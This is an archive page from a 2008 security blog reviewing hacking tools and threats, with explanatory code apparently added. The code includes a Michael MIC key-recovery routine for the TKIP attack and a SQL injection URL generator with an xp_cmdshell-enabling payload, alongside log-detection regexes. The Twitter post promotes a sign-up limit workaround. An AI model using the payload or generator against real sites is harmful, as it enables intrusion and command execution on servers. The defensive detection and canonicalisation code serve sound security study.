Archive | November, 2008

Samurai Web Testing Framework – Web Application Security LiveCD

The Samurai Web Testing Framework is a live Linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such as WebScarab and ratproxy. We then chose tools for discovery, including w3af and Burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

The Samurai project team is happy to announce the release of a development version of the Samurai Web Testing Framework. This release is currently a fully functional Linux environment that has a number of the tools pre-installed. Our hope is that people who are interested in making this the best live CD for web testing will provide feedback on what they would like to see included on the CD.

You can download Samurai here:

samurai-0.3

Or read more here.


Posted in: Hacking Tools, Web Hacking



WPA Wi-Fi Encryption Scheme Partially Cracked

WEP came down long ago, so it was only a matter of time before the standard that succeeded it, WPA, fell too. The big news last week was that WPA has finally been (partially) cracked; the attack will be presented this week at the PacSec conference.

After the insecurity of WEP was exposed, the majority of routers and Wi-Fi devices switched to WPA by default, so this may be a serious and widespread security issue. Especially since, now that the initial method and information is public, more refined and efficient cracking methods will come to light. Of course we shall report on any WPA cracking tools that we come across.

Security researchers say they’ve developed a way to partially crack the Wi-Fi Protected Access (WPA) encryption standard used to protect data on many wireless networks.

The attack, described as the first practical attack on WPA, will be discussed at the PacSec conference in Tokyo next week. There, researcher Erik Tews will show how he was able to crack WPA encryption and read data being sent from a router to a laptop computer. The attack could also be used to send bogus information to a client connected to the router.

To do this, Tews and his co-researcher Martin Beck found a way to break the Temporal Key Integrity Protocol (TKIP) key, used by WPA, in a relatively short amount of time: 12 to 15 minutes, according to Dragos Ruiu, the PacSec conference’s organizer.

That is a fast attack on TKIP. By comparison, WEP cracking requires a relatively large amount of captured traffic to get hold of enough weak IVs to recover the WEP key.

Breaking WPA in 12-15 minutes is impressive. It is not a full key-recovery attack, though: what it yields is the Michael MIC key for the router-to-client direction plus the keystream for one short packet, not the pairwise key, so it does not give the attacker full access to everything on the network.

They have not, however, managed to crack the encryption keys used to secure data that goes from the PC to the router in this particular attack.

Security experts had known that TKIP could be cracked using what’s known as a dictionary attack. Using massive computational resources, the attacker essentially cracks the encryption by making an extremely large number of educated guesses as to what key is being used to secure the wireless data.

The work of Tews and Beck does not involve a dictionary attack, however.

To pull off their trick, the researchers first discovered a way to trick a WPA router into sending them large amounts of data. This makes cracking the key easier, but this technique is also combined with a “mathematical breakthrough,” that lets them crack WPA much more quickly than any previous attempt, Ruiu said.

From what I understand it allows the attacker to basically hijack the ARP communications on the network, not the full data available.

So it could allow a router or edge device using WPA with TKIP to be targeted with ARP spoofing for a man-in-the-middle style attack.

Apparently an experimental implementation of the researchers’ attack has been introduced into a development version of the aircrack-ng tool.
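The piece of the attack that the articles gloss over as a "mathematical breakthrough" rests on a property of TKIP's integrity check that is worth seeing in code: the Michael MIC is built from invertible add/xor/rotate rounds, so anyone holding one plaintext message and its MIC can run the function backwards and read off the 64-bit MIC key. That is exactly the pair the Beck/Tews procedure obtains for a short packet, and it is why the result is a MIC key for one direction rather than the pairwise key. The following is an added example written for this page (not code from the researchers or from aircrack-ng): a straight implementation of Michael as specified in 802.11i, its inverse, and a constructed ARP-sized message to recover the key from. The sample key and message are made up.

```python
"""Michael MIC: forward computation and key recovery from one (message, MIC) pair."""
import struct

MASK = 0xFFFFFFFF


def rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def ror(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK


def xswap(x):
    """Swap the two bytes inside each 16-bit half of a 32-bit word."""
    return ((x & 0xFF00FF00) >> 8) | ((x & 0x00FF00FF) << 8)


def block(l, r):
    """Michael block function b(l, r): four add/xor/rotate rounds."""
    r ^= rol(l, 17)
    l = (l + r) & MASK
    r ^= xswap(l)
    l = (l + r) & MASK
    r ^= rol(l, 3)
    l = (l + r) & MASK
    r ^= ror(l, 2)
    l = (l + r) & MASK
    return l, r


def block_inv(l, r):
    """Exact inverse of block(): undo the rounds in reverse order."""
    l = (l - r) & MASK
    r ^= ror(l, 2)
    l = (l - r) & MASK
    r ^= rol(l, 3)
    l = (l - r) & MASK
    r ^= xswap(l)
    l = (l - r) & MASK
    r ^= rol(l, 17)
    return l, r


def pad(msg):
    """Michael padding: a 0x5a byte, then 4 to 7 zero bytes up to a multiple of 4."""
    msg = msg + b"\x5a" + b"\x00" * 4
    return msg + b"\x00" * (-len(msg) % 4)


def words(data):
    return struct.unpack("<%dI" % (len(data) // 4), data)


def michael(key, msg):
    """64-bit MIC of msg under the 8-byte key (both halves little-endian words)."""
    l, r = struct.unpack("<II", key)
    for m in words(pad(msg)):
        l ^= m
        l, r = block(l, r)
    return struct.pack("<II", l, r)


def recover_key(msg, mic):
    """Given a plaintext and its MIC, walk the function backwards to the key."""
    l, r = struct.unpack("<II", mic)
    for m in reversed(words(pad(msg))):
        l, r = block_inv(l, r)
        l ^= m
    return struct.pack("<II", l, r)


if __name__ == "__main__":
    # Constructed sample: a made-up MIC key and a 28-byte message standing in
    # for the ARP payload the attack recovers byte by byte with chopchop.
    key = bytes.fromhex("0123456789abcdef")
    msg = bytes(range(28))
    mic = michael(key, msg)
    print("MIC", mic.hex(), "-> recovered key", recover_key(msg, mic).hex())
```

The all-zero key over an empty message produces the 802.11i test vector 82925c1ca1d130b8, which is a quick sanity check that the rounds and the byte order are right. Once the attacker has the MIC key for the AP-to-client direction, every further forged packet in that direction can carry a valid MIC, which is what makes the ARP injection described above possible.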

Source: Computer World


Posted in: Exploits/Vulnerabilities, Wireless Hacking



SARA – Security Auditor’s Research Assistant – Network Analysis Tool

This tool has been around for a LONG time in some form or another; some of you old-skool guys may remember a package called SATAN, which was the best semi-automatic security analysis tool around back then. SARA grew out of SATAN and its development, and is now in its third generation.

Advanced Research’s philosophy relies heavily on software re-use. Rather than inventing a new module, SARA is adapted to interface to other community products. For instance, SARA interfaces with the popular Nmap package for superior “Operating System fingerprinting”. Also, SARA provides a transparent interface to SAMBA for SMB security analysis.

A recent addition to SARA is the ability to run on Windows 200* and Windows XP platforms. SARA relies on Cooperative Linux (coLinux) to provide the operating environment it needs to run as a Windows process. This product is called coSARA.

The Security Auditor’s Research Assistant (SARA) is a third generation network security analysis tool that:

  1. Operates under Unix, Linux, Mac OS X or Windows (through coLinux).
  2. Integrates the National Vulnerability Database (NVD).
  3. Performs SQL injection tests.
  4. Performs exhaustive XSS tests.
  5. Can adapt to many firewalled environments.
  6. Supports remote self-scan and API facilities.
  7. Is used for CIS benchmark initiatives.
  8. Has a plug-in facility for third party apps.
  9. Supports the CVE standard.
  10. Includes an enterprise search module.
  11. Runs in standalone or daemon mode.
  12. Has a free-use, open, SATAN-oriented license.
  13. Is updated twice a month (we try).
  14. Supports user extensions.
  15. Is based on the SATAN model.

The first generation assistant, the Security Administrator’s Tool for Analyzing Networks (SATAN) was developed in early 1995. It became the benchmark for network security analysis for several years. However, few updates were provided and the tool slowly became obsolete in the growing threat environment.

You can download SARA here:

sara-7.8.4.tgz (Linux)
cosara-7.4.1.exe (Windows)

Or read more here.


Posted in: Exploits/Vulnerabilities, Hacking Tools, Network Hacking



Malware Authors Jumping on the Obama Bandwagon

No surprise here: malware authors are leveraging the social engineering angle of the US presidential election.

In less than half a day, Google AdWords adverts and custom malware were popping up, lulling users into a false sense of security by using Obama’s name.

Malware purveyors have wasted no time capitalizing on Barack Obama’s landslide victory in the US presidential race. Within 12 hours of his acceptance speech Tuesday night, net users were being treated to scams involving Google AdWords and prodigious volumes of spam.

The spam comes masked as dispatches from legitimate news sources, including the BBC and CNN, and invite readers to click a link to view a video of Obama accepting his country’s vote. Those who take the bait are sent to a spoof page of the news site that claims they need to update their Adobe Flash Player before viewing the speech.

It seems to be a generic trojan/rootkit going after banking details; the election theme is just a new vector for getting it installed.

I guess a lot of people will fall for it though with the election fever hitting all around the World, not just in USA. Everyone is going Obama crazy!

In fact, Adobe_flash9.exe installs the notorious Trojan-PSW:W32/Papras.CL, according to anti-virus provider F-Secure. Earlier Wednesday, just 14 of the 36 major anti-virus programs detected the trojan, according to this analysis from VirusTotal. Once installed, the malware, which cloaks itself in a rootkit, logs passwords for bank sites and other sensitive information and sends them to a server located in Ukraine.

The fraudulent news sites are being hosted on a fast-flux network of infected machines, according to this analysis by the CyberCrime & Doing Time blog. Cloudmark, a company that provides spam filtering service, has already seen more than 10 million of the spam messages, according to the Zero Day blog.

Anyway, let the non-tech-savvy people you know that this is going on, and that they are likely to get e-mails or messages about Obama pretending to be from legitimate sources.

Under no circumstance should they follow the link and especially don’t install any flash or other software updates from such sites.

Source: The Register


Posted in: Malware, Social Engineering, Spammers & Scammers



MultiInjector – Automated Stealth SQL Injection Tool

MultiInjector claims to be the first configurable automatic website defacement software. I’m not sure if that’s a good thing or a bad thing.

But well here it is anyway.

Features

  • Receives a list of URLs as input
  • Recognizes the parameterized URLs from the list
  • Fuzzes all URL parameters to concatenate the desired payload once an injection is successful
  • Automatic defacement – you decide on the defacement content, be it a hidden script, or just pure old “cyber graffiti” fun
  • OS command execution – remote enabling of XP_CMDSHELL on SQL server, subsequently running any arbitrary operating system command lines entered by the user
  • Configurable parallel connections exponentially speed up the attack process – one payload, multiple targets, simultaneous attacks
  • Optional use of an HTTP proxy to mask the origin of the attacks

The author highly recommends running an HTTP sniffer such as IEInspector HTTP Analyzer in order to see all attack requests going out to the targets.
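The feature list above is the whole technique in outline: take a URL list, keep the URLs that carry query parameters, and append one payload to each parameter in turn. The same outline tells a defender what the traffic looks like in a web server log. The following is an added example for this page, not MultiInjector’s own code: the candidate-generation step on the attack side, beside the log-side check that flags the stacked-query `xp_cmdshell` enabling payload the tool advertises. Hostnames, the payload wording, and the Apache-style log lines are constructed for illustration.

```python
"""Per-parameter payload placement (attack side) and web-log detection (defence side)."""
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode, unquote_plus

# Constructed payload: closes the string, stacks the statements that switch on
# xp_cmdshell on SQL Server, and comments out the rest of the original query.
ENABLE_CMDSHELL = ("';EXEC sp_configure 'show advanced options',1;RECONFIGURE;"
                   "EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;--")


def is_parameterised(url):
    """True when the URL carries a query string worth fuzzing."""
    return bool(urlsplit(url).query)


def inject_candidates(url, payload):
    """One URL per query parameter, with the payload appended to that parameter only."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    out = []
    for i, (name, value) in enumerate(params):
        mutated = list(params)
        mutated[i] = (name, value + payload)
        out.append(urlunsplit(parts._replace(query=urlencode(mutated))))
    return out


def candidates_for(urls, payload):
    """Map each parameterised input URL to its list of mutated request URLs."""
    return {u: inject_candidates(u, payload) for u in urls if is_parameterised(u)}


# Detection side: combined-log-format lines, query string URL-decoded before matching.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
SQLI_MARKERS = re.compile(
    r"(xp_cmdshell|sp_configure|;\s*exec\b|'\s*(or|and)\s+\d+\s*=\s*\d+|union\s+(all\s+)?select)",
    re.I,
)


def flag_log_lines(lines):
    """Return (client_ip, decoded_path) for every request carrying an injection marker."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m.group("path"))
        if SQLI_MARKERS.search(decoded):
            hits.append((m.group("ip"), decoded))
    return hits


# Constructed sample log: one benign request, one injected request, one unrelated search.
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Nov/2008:10:01:02 +0000] "GET /products.asp?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Nov/2008:10:01:03 +0000] "GET /products.asp?id=12%27%3BEXEC+sp_configure'
    '+%27xp_cmdshell%27%2C1%3BRECONFIGURE%3B-- HTTP/1.1" 500 312',
    '198.51.100.4 - - [10/Nov/2008:10:02:00 +0000] "GET /search.asp?q=obama+speech HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    targets = ["http://target.example/item.asp?id=5&cat=2", "http://target.example/about.asp"]
    for src, muts in candidates_for(targets, ENABLE_CMDSHELL).items():
        print(src, "->", len(muts), "candidates")
    for ip, path in flag_log_lines(SAMPLE_LOG):
        print("FLAG", ip, path)
```

Two things a practitioner should take from it: the mutation loop touches one parameter at a time, so the number of requests per URL equals its parameter count and scales with the target list (which is what the "parallel connections" feature is speeding up), and on the defence side the decoding step matters, because `%27%3B` and `+` hide the markers from a naive substring match on the raw log line.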

Requirements

  • Python >= 2.4
  • Pycurl (compatible with the above version of Python)
  • Psyco (compatible with the above version of Python)

You can download MultiInjector v0.2 here:

MultiInjector.py

Or read more here.


Posted in: Database Hacking, Hacking Tools, Web Hacking



Twitter Squatting – The New Domain Jacking?

It seems the latest target for spammers, opportunists and those into Domain Squatting is the registration of interesting or possibly valuable Twitter usernames.

Twitter has exploded recently as a new ‘micro-blogging’ platform and it works really well, especially when combined with more traditional blogging and the host of tools that have been built around Twitter to let you find tweets about specific topics or events easily.

Now Twitter has created a new supply of valuable “names”: Twitter IDs. They take the form of twitter.com/stiennon for instance. Have you signed up for your free Twitter ID? Do you own your surname? Company name? Brand identity?

Is there evidence of Twitter squatting (squitting?) Let’s check. Yup, every single-letter TwitID is taken. Some are legitimate (Check out “S” for instance, that is a cool personal email assistant service) but X, Y, and Z are place holders. How about common words? Garage, wow, war, warcraft, Crisco, Coke, Pepsi, Nike, and Chevrolet are all taken. My guess is that Twitter squatters have grabbed all of these in the hopes that they will be worth selling in the not too distant future. Of course the legitimate holders of brands can sue for them and Twitter can just turn them over if asked. But, because the investment and risk for the squatter is zero, you are going to see the rapid evaporation of available Twitter IDs.

I wonder if this will be the next lucrative business, people registering thousands of Twitter usernames and speculating with them.

Imagine if your name or company name is taken, it’s gonna be cheaper than litigation to get it back to just pay the guy a few hundred or a few thousand dollars. If you haven’t gotten a Twitter ID yet I suggest you bag your name now before someone else does.

How to protect your own brand? Immediately go to Twitter.com and determine if your name is available. Get it while you can. While you are at it, reserve all of the names associated with your brand. You may decide that any domain you have invested in should have its Twitter ID. It is the domain name squatters who will jump on this new land grab first after all. Reserving multiple Twitter IDs is easy. Twitter attempts to limit reservations by requiring a unique email address for each sign-up. That is circumvented by using the Google “plus sign” email trick. Simply append something (your new Twitter ID for instance) to your Google email address like stiennon+itharvest@gmail.com. Gmail treats that as stiennon@gmail.com but Twitter thinks it is unique. I expect Twitter to fix this flaw shortly. They may even require email confirmation.

So go and get registering, especially if you have anything to do with the online presence of a real business – go and register the business name and derivatives now. You could save yourself some money when later the CTO or CEO thinks blogging and Twittering may really boost your brand equity.
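The plus-sign trick quoted above works only because the sign-up check compares addresses byte for byte. The fix on the service side is to canonicalise the address to the mailbox that will actually receive mail before checking uniqueness. The following is an added example for this page, not Twitter’s code: it strips sub-addressing after `+`, lower-cases, and for Gmail also drops dots and folds `googlemail.com` into `gmail.com` (both documented Gmail behaviours). Treating `+` as sub-addressing on every domain is an assumption made here; the sample addresses are constructed.

```python
"""Canonicalise sign-up e-mail addresses so sub-addressing tricks do not create duplicates."""

# Domains whose mailboxes ignore dots in the local part; googlemail.com is an alias of gmail.com.
DOT_INSENSITIVE = {"gmail.com", "googlemail.com"}


def canonical_email(addr):
    """Reduce an address to the mailbox that receives mail for it.

    Assumption: every domain honours '+' sub-addressing. A provider that does
    not would be over-merged (two real mailboxes treated as one), which for a
    uniqueness check errs on the side of refusing the sign-up.
    """
    addr = addr.strip().lower()
    if addr.count("@") != 1:
        raise ValueError("not a single mailbox address: %r" % addr)
    local, domain = addr.split("@")
    local = local.split("+", 1)[0]
    if domain in DOT_INSENSITIVE:
        local = local.replace(".", "")
        domain = "gmail.com"
    if not local or not domain:
        raise ValueError("empty local part or domain: %r" % addr)
    return "%s@%s" % (local, domain)


def is_duplicate_signup(existing, candidate):
    """True when candidate resolves to a mailbox already registered in existing."""
    seen = {canonical_email(e) for e in existing}
    return canonical_email(candidate) in seen


if __name__ == "__main__":
    # Constructed sample: the registered address and the variants a squatter would try.
    registered = ["stiennon@gmail.com"]
    for attempt in ["stiennon+itharvest@gmail.com", "St.Iennon+twitter@GoogleMail.com",
                    "stiennon@example.org"]:
        print(attempt, "->", canonical_email(attempt),
              "duplicate" if is_duplicate_signup(registered, attempt) else "new")
```

Canonicalising for uniqueness is separate from where you send mail: keep the address as typed for delivery and confirmation, and compare only the canonical form. E-mail confirmation on its own does not close this hole, since every `+` variant is delivered to the same inbox.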

Who knows? Better safe than sorry, right?

Source: Network World


Posted in: Phishing, Spammers & Scammers



Gooscan – Automated Google Hacking Tool

Whilst reading an article the other day I saw this mentioned and realised I haven’t written about this yet either, although I have written about the similar tool Goolag.

What is Gooscan?

Gooscan is a tool that automates queries against Google search appliances, but with a twist. These particular queries are designed to find potential vulnerabilities on web pages. Think “cgi scanner” that never communicates directly with the target web server, since all queries are answered by a Google appliance, not by the target itself.

Who is it written for?

Security professionals: This tool serves as a front-end for an external web server assessment and aids in the “information gathering” phase of a vulnerability assessment.

Web server administrators: This tool helps to discover what the web community may already know about you thanks to Google.

Is this tool legal?

From Google ToS – “You may not send automated queries of any sort to Google’s system without express permission in advance from Google.”

This means that you should not use this tool to query Google without advance express permission. Google appliances, however, do not have these limitations. You should, however, obtain advance express permission from the owner or maintainer of the Google appliance before searching it with any automated tool, for various legal and moral reasons.

The author wrote this tool not to violate Google’s terms of service (ToS), but to raise the awareness of the web security community that a ToS may not discourage the bad guys from writing and running a tool like this for malicious purposes. To that end, only use this tool to query _appliances_ unless you are prepared to face the (as yet unquantified) wrath of Google.

Why the proxy feature?

Many companies can only reach the Internet by way of an internal proxy server. When conducting an authorized assessment, it may be necessary to bounce queries off a web proxy instead of off the Google appliance directly.

You can download Gooscan v1.0 here:

Gooscan v1.0


Posted in: Hacking Tools, Web Hacking
